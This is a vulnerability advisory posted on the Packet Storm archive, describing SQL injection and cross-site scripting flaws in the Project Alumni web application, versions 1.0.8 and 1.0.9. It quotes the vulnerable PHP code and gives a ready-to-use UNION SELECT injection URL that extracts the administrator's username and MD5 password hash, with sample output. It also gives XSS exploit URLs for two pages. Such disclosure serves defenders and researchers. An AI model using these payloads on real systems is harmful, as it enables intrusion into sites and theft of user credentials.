exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

projectalumni-sqlxss.txt

projectalumni-sqlxss.txt
Posted Nov 26, 2007
Authored by tomplixsee

Project Alumni versions 1.0.9, 1.0.8, and possibly prior releases suffer from cross site scripting and SQL injection vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | ac4295d45d89f5c92cf220bd4f9ff1addec222418dbd42811ba1402402e576dc

projectalumni-sqlxss.txt

Change Mirror Download
project-alumni sql injection & xss
author : tomplixsee
tomplixsee@yahoo.co.id

--------------------------------------------------------------------------
affected software version : project alumni 1.0.9, 1.0.8, or lower??
download : https://sourceforge.net/projects/project-alumni/


vulnerability
=============

1.sql injection
++++++++++++++++
vulnerable code on view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");

exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1

result example:
________________________________________________________________________________
|Name |Email |
|--------------------------------------------------------------------------------|
| tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |Not Available |
|--------------------------------------------------------------------------------|

tomplixsee is admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin's password.


2.xss
++++++
vulnerable code:
_____________________________________________________________________________________
#/xml/index.php
#
# <?php
# if(isset($_GET["year"])){
# $year = $_GET["year"];
# }
# if($year=='FRND')
# $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";
# else
# $yearText = "Class of $year";
# ?>
# .....
# <?php echo"$yearText";?>
# .....
#
#exploit:
#http://victim/path/xml/index.php?year=<xss>
#_____________________________________________________________________________________
#/index.php
#
# <?php if(!$_GET['year']) { ?>
# ....
# <?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>
# ....
# <?php } else { ?>
# <h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>
#
#exploit
#http://victim/path/index.php?act=view&year=<xss>
#______________________________________________________________________________________


thanks to:
anak-anak jaringan sukabirus, all my friends at stt telkom, jasakom community,
sibalbal, crutz_ao, bidulux, akillers 179...........


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close